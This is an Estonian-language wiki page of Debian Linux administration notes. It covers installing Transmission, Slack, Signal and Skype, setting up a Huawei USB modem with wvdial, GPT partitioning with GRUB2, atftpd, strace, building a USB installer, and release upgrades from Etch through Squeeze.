Transmission tarkvaral on mitmed kasutajaliidesed, muu hulgas käsurealt kasutamise võimalus. Tarkvara paigaldamiseks sobib öelda

# apt-get install transmission-cli

Seejärel tuleb tekitada seadistusfail nt sellise sisuga ning moodustada näidatud kataloogid

$ cat ~/.config/transmission/settings.json
{
"download-dir": "/home/priit/transm",
"incomplete-dir": "/home/priit/transm-incomplete",
"incomplete-dir-enabled": true,
"open-dialog-dir": "/home/priit",
"recent-download-dir-1": "/home/priit/transm",
}

kusjuures esimesel käivitamisel kirjutab sinna programm paljude muude seadistusparameetrite vaikeväärtused lisaks juurde. Käivitamiseks sobib öelda nt

$ /usr/bin/transmission-cli /tmp/proxmox-ve_3.1-93bf03d4-8.iso.torrent

Tulemusena tekib fail

transm/proxmox-ve_3.1-93bf03d4-8.iso

===Amule===

TODO

===Debian Live===

Debian Live projekt http://debian-live.alioth.debian.org/ tegeleb selliste vahendite ettevalmistamisega, millega kasutaja saab moodustada oma vajaduste rahuldamiseks sobivaid operatsioonisüsteemi tõmmiseid. Live keskkonnale on iseloomulik, et operatsioonisüsteem laaditakse mingilt nö mitte-kõvakettalt, vaid nt CD/DVD plaadilt, USB pulgalt või võrgust ning et sellise keskkonna kasutamine ei mõjuta arvuti lokaalse kõvaketta olekut.

====live-helper====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-helper

Tarkvara kasutamist on kirjeldatud aadressil http://live.debian.net/manual/html/index.html.

Nt alglaadiva usb pulga tõmmise ettevalmistamiseks sobib kasutada

# mkdir /usr/src/live
# cd /usr/src/live
# ld_config
# ld_build -b usb-hdd

Tulemusena tekib fail binary.img mida saab kopeerida nt Windows Vista keskkonnas USB pulgale programmiga http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

Tulemuse katsetamiseks sobib qemu, sedasi

# qemu -hda binary.img

====live-magic====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-magic

Debian Live Magic programmi käivitamiseks tuleb öelda juurkasutajana

# live-magic

ning avaneb järgnev pilt

[[Pilt:Debian-live-1.gif]]

kus tuleb valida, millist Live keskkonda ettevalmistama asutakse.

===Slack kasutamine===

Slack https://slack.com/ paigaldamiseks sobib kopeerida .deb fail ning öelda

# apt-get install failinimi.deb

Paistab, et tarkvara paigaldamise käigus tekitatakse fail

# cat /mnt/kontdeb9/etc/apt/sources.list.d/slack.list
deb https://packagecloud.io/slacktechnologies/slack/debian/ jessie main

===Signal kasutamine===

Tarkvara kopeerimiseks https://signal.org/download/

<pre>
# cat /etc/apt/sources.list.d/signal-xenial.list
deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main

# curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
</pre>

ja paigaldamiseks

<pre>
# apt-get update
# apt-get install signal-desktop
</pre>

===Skype kasutamine===

Aadressil http://www.skype.com/ jagatakse Skype tarkvara mitmel erineval kujul

* 32 bit
* 64 bit
* staatiliselt lingitud

====2017 - Skype v. 5.0 kasutamine====

Märkus: 2017 kevadel on v. 5.0 beta, mis praktiliselt tähendab, et muidu töötab, aga chat histori otsingut pole.

Lisada võti

# curl https://repo.skype.com/data/SKYPE-GPG-KEY | sudo apt-key add -

lisada fail /etc/apt/sources.list.d/skypeforlinux.list

# cat /etc/apt/sources.list.d/skypeforlinux.list
deb [arch=amd64] https://repo.skype.com/deb stable main

ja paigaldada

# apt-get update
# apt-get install skypeforlinux

Kasulikud lisamaterjalid

* https://www.ubuntuupdates.org/ppa/skypeforlinux

====pre 2017 - Skype kasutamine 64 bit keskkonnas====

Süsteemi etteavalmistamisel tuleb paigaldada paketid ia32-libs-gtk ja libqt4-dev

# apt-get install ia32-libs-gtk libqt4-dev

Seejärel skype 64 bit pakett, muus osas peaks töötama kuigi käivitamisel öeldakse

$ skype
Gtk-Message: Failed to load module "canberra-gtk-module": \
/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so: wrong ELF class: ELFCLASS64
(<unknown>:6901): Gtk-WARNING **: /usr/lib/gtk-2.0/2.10.0/engines/libglide.so:
wrong ELF class: ELFCLASS64

====Skype kasutamine Debian Wheezy multiarch keskkonnas====

* kopeerida Skype lokaalsesse reposse - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Privaatse_failis.C3.BCsteemi_repositooriumi_kasutamine
* lisada süsteemile i386 arhitektuur - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_kasutamine#Multiarch_kasutamine
* paigaldada skype

# apt-get install skype:i386

====Skype v. 8.x kasutamine====

Kui järgmine v. 8.y versioon ei sobi, siis saab eelmise x. 8.x paigaldada nt selliselt

# apt-get install skypeforlinux=8.11.0.4

Nimekiri variantidest on näha aadressil https://repo.skype.com/deb/pool/main/s/skypeforlinux/

====Skyperious====

Head inimesed on programmeerinud Python keeles tarkvara Skyperious http://suurjaak.github.io/Skyperious/index.html, mille abil saab Skype andmebaaside sisu, st praktiliselt jutuajamist ajalugu, uurida ilma Skype programmi enda, võrguühenduse jms olemasoluta. Tundub, et programm kasutab asjaolu, et vastav andmebaas on praktiliselt SQLite andmebaas. Praktiliselt võib see olla abiks kui Skype versiooni uuendamisel ei õnnestu chat history sisu uude versiooni kaasa võtta, nt v. 4.2 -> 4.3 uuendamisel Linux all. Skyperiuos kasutajaliides paistab selline

[[Pilt:Skyperious-1.gif]]

Tarkvara paigaldamist kirjeldatakse aadressil https://github.com/suurjaak/Skyperious. Lühidalt tuleb Debian Jessie all öelda

# apt-get install wx2.8-i18n libwxgtk2.8-dev libgtk2.0-dev
# apt-get install python-wxgtk2.8 python-wxtools
# apt-get install python-pip

Seejärel lähtetekst lahti pakkida ja öelda

# pip install --allow-all-external --allow-unverified -r requirements

Kasutajana käivitamisel öeldakse alustuseks

$ skyperious.sh
-su: skyperious.sh: /bin/sh^M: bad interpreter: No such file or directory

millest saab üle nn dos reavahetuste eemaldamisega

# fromdos skyperious.sh

====Misc====

Skype vestlusaknas saab teksti parandada nn Sed süntaksit kasutades

mart: priiti, ei ole võimalik

,-------------------------------,
| s/priiti/Priit/ |
|_______________________________|

http://share.skype.com/sites/linux/2009/09/some_explanations.html

===PulseAudio kasutamine===

http://pulseaudio.org/

===Huawei netipulga kasutamine===

2010 aastal on populaarne kasutada mobiilse internetiühenduse teenust Huawei USB netipulga abil. Sellist tüüpi netipulgad on sisuliselt GSM modemid, mis ühendatakse arvutiga USB kaudu ning mille kasutamiseks peab seadmesse olema paigaldatud mobiilside operaatori kehtiv SIM-kaart (Subscriber Identity Module). Selline netipulk ei ole kuidagi seotud wifiga ning seda saab kasutada asudes mobiilside operaatori levialas. Netipulga kasutamiseks peab olema arvutisse paigaldatud PPP kliendi tarkvara, nt wvdial ja arvuti oskama kasutada USB-serial seadmeid.

Kasulikud lisamaterjalid

* http://wiki.debian.org/Modem/3G

====Riistvara====

Näiteks olgu kasutada Huawei E620 USB Modem seade ning teenusepakkuja EMT andmesideteenus.

# lsusb
...
Bus 002 Device 003: ID 12d1:1001 Huawei Technologies Co., Ltd. E620 USB Modem

====Tarkvara====

Netipulga kasutamiseks piisab Debian Lenny paketihalduse tarkvarast, st vajalikest tuuma moodulitest ning wvdial programmist, mille paigaldamiseks sobib öelda

# apt-get install wvdial

====Seadistamine ja käivitamine====

Esmalt tuleb laadida maha usb-storage, option ja usbserial tuuma moodulid

# rmmmod usb-storage
# rmmod option
# rmmod usbserial

ning laadida usbserial sobivate parameetritega, vastavalt käesolevale lsusb väljundile, nt

# modprobe usbserial vendor=0x12d1 product=0x1001

Tulemusena on kasutada USB-serial seadmed

# ls -l /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Apr 27 23:46 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Apr 27 23:15 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Apr 27 23:15 /dev/ttyUSB2
crw-rw---- 1 root dialout 188, 3 Apr 27 23:15 /dev/ttyUSB3

wvdial tarkvara tööd juhib seadistusfail /etc/wvdial.conf

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99***1#
Username = username
Password = password
Stupid Mode = 1
Dial Command = ATDT

[Dialer hsdpa]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ISDN = 0
Modem Type = Analog Modem

kus

* Phone - väärtus sõltub teenusepakkujast

Käivitamiseks sobib öelda juurkasutajana

# wvdial hsdpa
--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Modem initialized.
--> Sending: ATDT*99***1#
--> Waiting for carrier.
ATDT*99***1#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Tue Apr 27 23:41:55 2010
--> Pid of pppd: 7879
--> Using interface ppp0
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> local IP address 192.168.3.91
--> pppd: @« @« x«
--> remote IP address 10.64.64.64
--> pppd: @« @« x«
--> primary DNS address 192.168.32.116
--> pppd: @« @« x«
--> secondary DNS address 192.168.32.115
--> pppd: @« @« x«

Tulemusena tekib süsteemi juurde PPP seade, nt

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.3.91 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:3 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:118 (118.0 B) TX bytes:157 (157.0 B)

====Netipulga kasutamine====

Peale PPP lingi tekkimist piisab liiklus ruutida üle selle lingi ning saab kasutada võrku, nt

# route add -net 172.23.0.0 netmask 255.255.0.0 gw 192.168.3.91

Lisaks nö sihipärasele mobiilsele töökohale andmeside tekitamisele on võimalikud nt sellised kasutusalad

* ühendada võrku arvuteid, mida muul viisil võib olla tülikas ühendada
* ühendada arvutile külge alternatiivne andmesidekanal (nt monitooringuarvutist teadete saatmiseks)

Kasutamisel tuleb arvestada, et läbi lisandunud seadme on võimalik lisaks välja pöördumisele ka sisse pöörduda, seepärast tasub kaaluda seoses netipulgaga paketifiltri kasutamist.

===ffmpeg kasutamine===

ffmpeg tarkvara abil saab ekraanil toimuvat nö videona salvestada

$ ffmpeg -f x11grab -s 720x480 -r 23.976 -i :0.0 /tmp/file.mpg

QuickTime andmete teisendamine

$ ffmpeg -i video-in.mov -vcodec mpeg4 video-out.avi

QuickTime teisendamine Digital Video formaati

$ ffmpeg -i fail.mov -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 fail.dv

Taasesitamine nö ressursisäästlikult

$ mplayer -vo xv -vfm ffmpeg -lavdopts lowres=1:fast:skiploopfilter=1 video-out.avi

Kasulikud lisamaterjalid

* http://viki.pingviin.org/MPlayer
* http://www.kinodv.org/

===Märkused===

* Selleks, et vaikimisi ei seataks pakettidele DF (don't fragment), sobib öelda

# sysctl -w net.ipv4.ip_no_pmtu_disc=1

* arvuti viimaseid reboote näitab käsk

# last reboot -f /var/log/wtmp.1
reboot system boot 3.16.0-4-amd64 Fri Aug 7 00:35 - 02:03 (38+01:27)
reboot system boot 3.16.0-4-amd64 Wed Aug 5 00:14 - 00:35 (2+00:20)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:57 - 23:51 (00:53)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:56 - 22:57 (00:01)

kus esimese rea teine kellaaeg on käesolev aeg (ja liigub), sulgudes on praktiliselt arvuti käesolev uptime; teiste ridade sulgudes on vastavad uptime ajad

* Failide-alamkataloogide-jms arv kataloogis

# for i in `ls -d /*` ; do echo -n "$i: "; find $i | wc -l; done

===PCMCIA seadmete kasutamine===

# apt-get install pcmciautils

===ExpressCard seadmete kasutamine===

Reeglina paistavad ExpressCard http://en.wikipedia.org/wiki/ExpressCard seadmed operatsioonisüsteemile USB seadmetena.

===syslog-ng kasutamine logiserverina===

syslog-ng http://www.balabit.com/network-security/syslog-ng/ sobib kasutada logiserveris ja tal on sellised omadused

* TODO

Debian Lenny sisaldab syslog-ng versioon 2.0, paigaldamiseks tuleb öelda

# apt-get install syslog-ng

Tarkvara tööd juhib seadistusfail /etc/syslog-ng/syslog-ng.conf

===Failisüsteem===

Debiani failisüsteemiga on seotud operatsioonisüsteemi seisukohalt sellised üldised asjaolud

* /proc ja /sys kataloogid on nö vaated töötavale linuxi tuumale

====Named ja unnamed pipe====

Pipe on FIFO ja selle instrumendi abil saavad programmid omavahel andmeid vahetada, nt named pipe puhul sobib ühes aknas öelda

$ mkfifo /tmp/fifonimi
$ cat < /tmp/fifonimi

ja teises aknas öelda

$ cal > /tmp/fifonimi

siis tulemusena esitatakse esimeses aknas cal käsu väljund.

Osutub, et pipe ei ole alati vajalik moodustada mkfifo käsu abil, sobib ka nii, sellisel juhul on tegu anonüümse pipe'iga

$ cal | cat

===Pidgin===

Pidgin (nö vana nimega Gaim) http://www.pidgin.im/ on mitmeid protokolle toetav instant messaging tarkvara. Kuna Debiani paketihalduse Pidgin tõrgub vahel, siis üks otsekohene alternatiiv on kasutada lähtetekstist kompileeritud Pidgini

# apt-get build-dep pidgin
$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn
$ make
$ make install

Pidgin v. 2.10.0, tundub, et kui kasutada süsteemis mozilla.debian.net tarkvara, siis ebaõnnestub sõltuvuste tõttu

# apt-get build-dep pidgin

Sellisel juhul tuleb käsitsi paigaldada

# apt-get install intltool libglib2.0-dev libgtk2.0-dev

$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn --disable-nm --disable-screensaver \
--disable-gtkspell --disable-gstreamer --disable-meanwhile --disable-avahi --disable-dbus --disable-tk
...

===lm-sensors===

lm-sensors http://www.lm-sensors.org/ tarkvara paigaldamiseks sobib öelda

# apt-get install lm-sensors

Esmalt tuleb teha kindlaks olemasolev riistvara ning laadida vastavad moodulid

# sensors-detect

Kasutamiseks öelda nt

# sensors -A | grep Core
Core 0: +47.0 C (high = +76.0 C, crit = +100.0 C)
Core 1: +51.0 C (high = +76.0 C, crit = +100.0 C)
Core 2: +41.0 C (high = +76.0 C, crit = +100.0 C)
Core 3: +41.0 C (high = +76.0 C, crit = +100.0 C)

kus

* Core N - protsessori tuuma temperatuur

===GPT kasutamine===

GPT (GUID Partition Table) http://en.wikipedia.org/wiki/GUID_Partition_Table on seotud järgmiste probleemide lahendamisega

* operatsioonisüsteemis soovitakse kasutada suuremat partitsiooni kui 2TB
* arvuti riistvara ei kasuta nn PC-BIOS'i vaid nt UEFI't (Unified Extensible Firmware Interface)
* kasutatakse 4096 B plokisuurusega kõvaketast
* saab kasutada kuni 128 nn primary partitsiooni

====GPT partitsioonide haldamine====

GPT partitsioonide haldamiseks sobib 2010 aasta suvel kasutada nt programme parted ja gdisk, esmalt tuleb moodustada plokkseadmele label öeldes

# parted /dev/sdc
(parted) mklabel gpt
Warning: The existing disk label on /dev/sdc will be destroyed and all data on this disk will be lost. Do you want to continue?
Yes/No? Yes

TODO

Kui kasutada fdisk programmi GPT partitsioonitabelit kasutava plokkseadmega, siis paistab tulemus selline

# fdisk -uc /dev/sda -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.
...
Device Boot Start End Blocks Id System
/dev/sda1 1 10485759 5242879+ ee GPT

====GRUB2 alglaaduri kasutamine GPT ja PC-BIOS riistvaraga====

Kui UEFI riistavara töötab GRUB2 alglaaduri ja GPT partitsioneeritud kõvakettaga nö otseselt, siis PC-BIOS arvuti puhul tuleb kasutada seejuures mõnda täiendavat võtet. Üldiselt toimub PC-BIOS riistvaral töötava süsteemi alglaadimine selliselt

* kõvakettale on moodustatud kolm GPT partitsiooni

(parted) p

Number Start End Size File system Name Flags
1 2048s 4095s 2048s biosboot bios_grub
2 4096s 1052671s 1048576s boot
3 1052672s 3905974271s 3904921600s system

* alglaadimisel loetakse üks alglaaduri aste esimeselt partitsioonilt
* järgmised astmed ning operatsioonisüsteemi tuum ja initramfs loetakse boot partitsioonilt
* operatsioonisüsteemi juurfailisüsteem asub kolmandal partitsioonil või sellel paiknevalt loogiliselt seadmelt, nt LVM köitelt

=====GPT partitsioonide moodustamine=====

(parted) unit s
(parted) mkpart biosboot 2048 4095
(parted) set 1 bios_grub on
(parted) mkpart boot 4096 1052671
(parted) mkpart system 1052672 3907026943
(parted) set 3 lvm on

kus

* tuleb jälgida, et partitsioonide suurused saavad sobivad, kaks esimest võiksid olla suhtliselt universaalselt sobivad

=====Failisüsteemide ettevalmistamine=====

GPT pealt töötava süsteemi saab ettevalmistada nt ühendades vastav plokkseade külge mõnele olemasolevale töötavale süsteemile. Seejärel moodustada seadmele GPT partitsioonitabel, failisüsteemid ning kopeerida sinna töötav süsteem üle, nt rsync abil.

=====GRUB2 seadistamine ja paigaldamine=====

GRUB2 seadistamiseks sobib kasutada nt sellist /etc/grub.d/40_custom faili

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.

echo "Debian GPT" >&2
menuentry "Debian GPT" {
insmod part_gpt
insmod ext2
set root=(hd0,gpt2)
linux /vmlinuz-2.6.32-2-amd64 root=/dev/mapper/system-root ro
initrd /initrd.img-2.6.26-2-amd64
}

kus

* insmod part_gpt - grub2 laadib omale GTP partitsioonitabeli tundmise tarkuse
* (hd0,gpt2) - näitab millisel GPT partitsioonil asub /boot failisüsteem

Eeldusel, et failisüsteemid on monteeritud öelda

# grub-install --recheck --no-floppy --root-directory=/mnt/root /dev/sda
Installation finished. No error reported.

Tulemusena peaks arvuti käivituma.

====4096 B plokisuurusega kõvaketaste kasutamine====

2010 aasta suvel on 4k plokisuurusega kõvaketaste kasutamine pisut ebaselge, tundub, et üldiselt peaks utiliidid sellega automaatselt hiljem või varem hakkama saama. Hetkel näib ohutu nö käsitsi arvestada, et partitsiooni algus satuksid arvudega 8 ja 512 jaguvatele kohtadele, nt kasutades GPT partitsioonitabelit selliselt

(parted) unit s
(parted) mkpart system 2048 327679999
(parted) mkpart pgdata 327680000 164863999

kus

* unit s - edasi esitatakse partitsiooni algus ja lõpp sektori numbrina
* system - partitsiooni nimi kasutajale tähendust omaval kujul
* 2048 - partitsiooni algussektor
* 327679999 - partitsiooni lõpp sektor, arvestusega, et 327679999 + 1 jagub arvudega 8 ja 512

Paritsioonitüüpide näitamiseks öelda

(parted) set 1 lvm on
(parted) set 2 lvm on

Tulemuseks on

(parted) p
Model: ATA WDC WD2003FYYS-0 (scsi)
Disk /dev/sdc: 3907029168s
Sector size (logical/physical): 512B/512B
Partition Table: gpt

Number Start End Size File system Name Flags
1 2048s 327679999s 327677952s system lvm
2 327680000s 328703999s 1024000s pgdata lvm

Kui selliselt ettevalmistatud plokkseadmel kasutada failisüsteemi või nt mdadm, lvm või cryptsetup lahendusi, siis väidetavalt neile sobib 4k plokisuuris hästi.

====Kasulikud lisamaterjalid====

* http://www.ibm.com/developerworks/linux/library/l-4kb-sector-disks/
* http://www.johannes-bauer.com/linux/wdc/?menuid=3
* http://grub.enbug.org/BIOS_Boot_Partition
* http://wiki.archlinux.org/index.php/User:Skodabenz/GPT
* http://jamie.mayfirst.org/posts/2010/two-tb-disks/
* http://www.wensley.org.uk/gpt

===atftpd kasutamine===

atftpd on tftpd server ning atftp vastav klient.

====Server====

Serveri paigaldamiseks sobib öelda

# apt-get install atftpd

Seejuures küsitakse hulk küsimusi, vaikimisi käivitatakse paigaldamise lõpuks tftp teenus inetd superserverist ning kataloogiks on /srv/tftp.

Tööd juhitakse

* /etc/default/atftpd failis

USE_INETD=true

* /etc/inetd.conf failis sarnase reaga

tftp dgram udp4 wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd --tftpd-timeout 300 \
--retry-timeout 5 --no-multicast --maxthread 100 --verbose=5 --logfile /var/log/atftpd.log /srv/tftp

====Klient====

Kliendi paigaldamiseks sobib öelda

# apt-get install atftp

Kasutamiseks öelda nt

$ atftp 192.168.10.10
tftp> get /srv/tftp/sg200-18-20131217-mirror.conf

Tulemusena kopeeritakse fail kliendi käesolevasse kataloogi.

===strace programmi kasutamine===

Nö failisüsteemi tcpdump kasutamiseks sobib esmalt vaadata nt veebiseveri protsesside numbrid ja seejärel öelda

$ strace -p 19282 -p 19283 -p 19284 -p 19285 -p 19286 -p 19368 -p 20015 -p 29774 -p 29775 -f -e trace=open

kus

* -f - järgib forkisid
* -e määratleb, et jälgitakse failiavamisi

Märkused

* kui kasutada mitu korda -e parameetrit, siis kehtestub ainult viimane kasutamine
* kui kasutada -e järel mitut väärtust, nt '-e trace=read,write', siis väärtused OR-itakse kokku
* kui on soov jälgida konkreetse file descriptori kasutusi, siis tuleb strace väljundi teksti töödelda grep vms üldiste vahenditega
* shelli protsessi on huvitav strace'ida teisest aknast

Kasulikud lisamaterjalid

* http://myhowto.org/solving-problems/7-exploring-system-internals-with-lsof-and-strace/
* http://www.noah.org/wiki/Debugging_notes

===Debian Squeeze paigaldamine USB pulgalt===

Debian Squeeze operatsiooniüsteemi USB pulgalt paigaldamise eeldusteks on

* kasutada on olemasolev võrguühendusega Linux arvuti
* installeeritav arvuti boodib USB pulgalt
* installeeritava arvuti saab ühendada võrku

USB pulk tuleb Debian Squeeze paigaldamiseks ettevalmistada järgmiselt

* vastaku USB pulgale seade /dev/sdf, pulk peab olema monteerimata olekus, st öelda

# umount /dev/sdf

* lähtudes aadressilt http://www.debian.org/devel/debian-installer/ kopeerida sobivad boot.img.gz ning netinst.iso failid, nt

# http://ftp.nl.debian.org/debian/dists/testing/main/installer-amd64/current/images/hd-media/boot.img.gz
# http://cdimage.debian.org/cdimage/squeeze_di_rc1/amd64/iso-cd/debian-sq-di-rc1-amd64-netinst.iso

* kopeerida boot.img.gz pulgale öeldes

# zcat boot.img.gz > /dev/sdf

* monteerida pulk ning kopeerida netinst iso

# mkdir /mnt/sdf
# mount /dev/sdf /mnt/sdf
# cp debian-sq-di-rc1-amd64-netinst.iso /mnt/sdf

* ainult nn kommertsdraiveritega töötava riistvara kasutamiseks on vajalik lisaks kopeerida arhiiv firmware.tar.gz aadressilt http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/, nt

# wget http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/firmware.tar.gz

ning pakkida lahti pulga juurikale kataloogi firmware

# mkdir /mnt/sdf/firmware
# tar -C /mnt/sdf/firmware -z -x -f firmware.tar.gz

Lõpuks tuleb pult lahti monteerida

# umount /mnt/sdf

Pulga kasutamiseks tuleb pult ühendada kõnealuse arvutiga, BIOS'ist seadistada käivituma USB pulgalt ning algab tarkvara paigaldus. Paigalduse käigus peaks olema kasutada internetiühendus.

===SSL juur-sertifikaatide lisamine===

Selleks, et süsteemi utiliidid, nt wget tunnustaksid veebiserveri sertifikaati peab olema vastav juur-sertifikaat ära kirjeldatud. Juur-sertifikaadi lisamiseks tuleb

* paigaldada pakett ca-certificates

# apt-get install ca-certificates

* kopeerida uus juur-sertifikaat kataloogi /usr/local/share/ca-certificates (failinimi peab lõppema .crt vastasel korral update-ca-certificates skript seda ei käsitle)

# cp Juur-LOOMAAED-cacert.pem /usr/local/share/ca-certificates/Juur-LOOMAAED.crt

* öelda

# update-ca-certificates

Tulemusena genereeritakse uued c_rehashid kataloogi /etc/ssl/certs

# ls -l /etc/ssl/certs/ | grep Juur
lrwxrwxrwx 1 root root 44 Feb 3 14:18 Juur-LOOMAAED.pem -> /usr/local/share/ca-certificates/Juur-LOOMAAED.crt
lrwxrwxrwx 1 root root 11 Feb 3 14:18 a376ee62.0 -> Juur-LOOMAAED.pem

ning lisatakse ta suurfaili /etc/ssl/certs/ca-certificates.crt.

===Debian v. 4 Etch -> v. 5 Lenny uuendamine===

Kui sources.list failis lenny kasutamise järel apt-get update ütleb vea

W: There is no public key available for the following key IDs:
4D270D06F42584E6
W: You may want to run apt-get update to correct these problems

siis aitab paigaldada debian-archive-keyring pakett

# apt-get install debian-archive-keyring

Kui kasutusel on uuemad bnx2 draiveriga käivad võrgukaardid, siis tuleb jälgida, et oleks paigaldatud pakett firmware-bnx2

# apt-get install firmware-bnx2

===Debian v. 5 Lenny -> v. 6 Squeeze uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 5.0 -> v. 6.0) juhend asub aadresil http://www.debian.org/releases/squeeze/amd64/release-notes/ch-upgrading.en.html

Uuendamise on oluline tähele panna järgmisi asjaolusid

* asutakse kasutama dash shelli nö süsteemse shellina, mh tähendab see, et /bin/sh -> bash asemel on

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Dec 26 2010 /bin/sh -> dash

* asuda uuendama süsteemi, millele on kõik Lenny uuendused rakendatud
* asendatakse legacy GRUB GRUB2 alglaaduriga, vajadusel anda pärast uuendust töötavas Squeeze süsteemis käsk upgrade-from-grub-legacy
* veenduda enne uuendamise protseduuri, et failisüsteemis on piisavalt vaba ruumi
* asutakse bootloaderis kasutama failisüsteemide plokkseadmetele vastavaid UUID väärtusi
* eemdalda paketihaldusest mitte paigaldatud tarkvara (nt VMWare Tools)
* eemaldada /etc/ alt nö käsitsi lisatud start-up skriptid, mis võivad segada automaatset süsteemi migreerimist kasutama insserv käivitusskripte

====Uuendamise protseduur====

* veenduda, et on olemas süsteemist varukoopia
* rakendada paketihaldusest uuendused vanale süsteemile
* teha seadistusfailidest koopia, et oleks mugav võrrelda

# cp -a /etc /root/etc-20110522-tootanud-lenny
# cp -a /boot /root/boot-20110522-tootanud-lenny

* eemaldada paketihaldusest mitte paigaldatud tarkvara, nt

# vmware-uninstall.pl

* kasutada /etc/apt/sources.list faili sisuga, uuendamise ajal on security välja kommenteeritud

deb http://ftp.ee.debian.org/debian/ squeeze main contrib non-free
deb-src http://ftp.ee.debian.org/debian/ squeeze main contrib non-free

# deb http://security.debian.org/ squeeze/updates main contrib non-free
# deb-src http://security.debian.org/ squeeze/updates main contrib non-free

ning öelda

# apt-get update
# apt-get dist-upgrade -d

* kasutada script'i esitatud küsimuste-vastuste-teadete salvestamiseks, mis töötab üldiselt nii

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script
Script started, file is /root/upgrade-squeezestep.script
# date
...
# Ctrl-D
Script done, file is /root/upgrade-squeezestep.script

script tööga kaasneb kaks protsessi

# ps aux | grep scr
root 4960 0.0 0.0 5848 572 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script
root 4961 0.0 0.0 5852 460 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script

* käivitada script abil salvestamine

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script

* uuendada tuum ja udev

# apt-get install linux-image-2.6-amd64

Seejuures pakutakse ja võiks aktsepteerida plokkseadmete UUID väärtuste kasutamist.

# apt-get install udev

* vajadusel paigaldada non-free firmware draiverid öeldes (nt bnx 10g seadme jaoks)

# apt-get install firmware-linux-nonfree

* veenduda, et /boot/grub/menu.lst algaadib uue tuumaga, /etc/fstab ühendab külge sobivad failisüsteemid ja alglaadida süsteem
* veenduda, et failisüsteemis on piisavalt ruumi, käivitada script ja paigaldada muud süsteemi uuendused

# script -t 2>~/dist-upgrade-squeezestep.time -a ~/dist-upgrade-squeezestep.script
# apt-get dist-upgrade

* dash shelli kasutamiseks öeldakse

The system shell is the default command interpreter for shell scripts.

Using dash as the system shell will improve the system's overall performance. It does not alter the shell
presented to interactive users. Use dash as the default system shell (/bin/sh)?

* dist-upgrade käigus üritatakse migreerida dependecy-based insserv käivitusskriptidele

The boot system is prepared to migrate to dependency-based sequencing. This is an irreversible step, but one that is recommended:
it allows the boot process to be optimized for speed and efficiency, and provides a more resilient framework for development.

A full rationale is detailed in /usr/share/doc/sysv-rc/README.Debian. If you choose not to migrate now, you can do so later by
running "dpkg-reconfigure sysv-rc".

Migrate legacy boot sequencing to dependency-based sequencing?

* Uuendamisel tuleb kasutaja poolt muudetud seadistusfailid lasta uute nn package maintainer versiooniga üle kirjutada ja pärast muudatused käsitsi kohendada, nimekirja muudetud failidest näeb nt nii

# grep "Configuration file" dist-upgrade-squeezestep.script
Configuration file `/etc/security/limits.conf'
Configuration file `/etc/nagios/nrpe.cfg'
Configuration file `/etc/sysctl.conf'
Configuration file `/etc/rsyslog.conf'
Configuration file `/etc/ssh/ssh_config'
Configuration file `/etc/apache2/apache2.conf'
Configuration file `/etc/apache2/ports.conf'
Configuration file `/etc/joe/joerc'
Configuration file `/etc/snmp/snmpd.conf'
Configuration file `/etc/default/snmpd'

kusjuures asendatud failst salvestatakse reeglina koopia nimele lisades lõppu .dpkg-old, nt

/etc/snmp/snmpd.conf.dpkg-old

st ülekirjutatud failid leiab nt nii

# find /etc/ -name \*-old

* vmware tools kompileerimise asemel on alternatiiv kasutada paketti open-vm-tools, kasutaja peab ise otsustama mida eelistada

# apt-get install open-vm-tools
...
Loading open-vm-tools modules: vmhgfsFATAL: Module vmhgfs not found.
vmmemctlFATAL: Module vmmemctl not found.
vmsyncFATAL: Module vmsync not found.

* vajadusel öelda

# dpkg-reconfigure sysv-rc

